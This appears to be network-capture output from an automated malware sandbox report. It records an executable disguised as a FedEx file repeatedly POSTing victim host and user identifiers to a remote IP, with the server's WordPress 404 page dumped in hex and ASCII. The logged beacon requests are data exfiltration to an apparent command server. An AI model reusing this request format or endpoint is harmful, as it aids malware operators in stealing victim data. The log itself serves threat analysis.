                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:32.748161077 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:32.748337030 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:32.748538971 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:32.748749971 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:32.748766899 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:32.749150038 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:03:32.749166965 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:03:32.749181032 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:03:32.752902985 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.74974545.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:32.900181055 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:32.913181067 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:36.089167118 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:33 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:36.089694977 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:36.093080997 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:36.093094110 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:36.096280098 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:36.096292973 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:03:36.096304893 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:03:36.096317053 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                May 22, 2024 22:03:36.098522902 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:03:36.099438906 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.74974645.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:36.285873890 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:36.335956097 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:39.642385960 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:36 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:39.642401934 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:39.644232035 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:39.646214008 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:39.646225929 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:39.650084019 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:03:39.652012110 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:03:39.652024984 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                May 22, 2024 22:03:39.655905008 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                May 22, 2024 22:03:39.655926943 CEST556INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.74974745.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:39.786935091 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:39.836019993 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
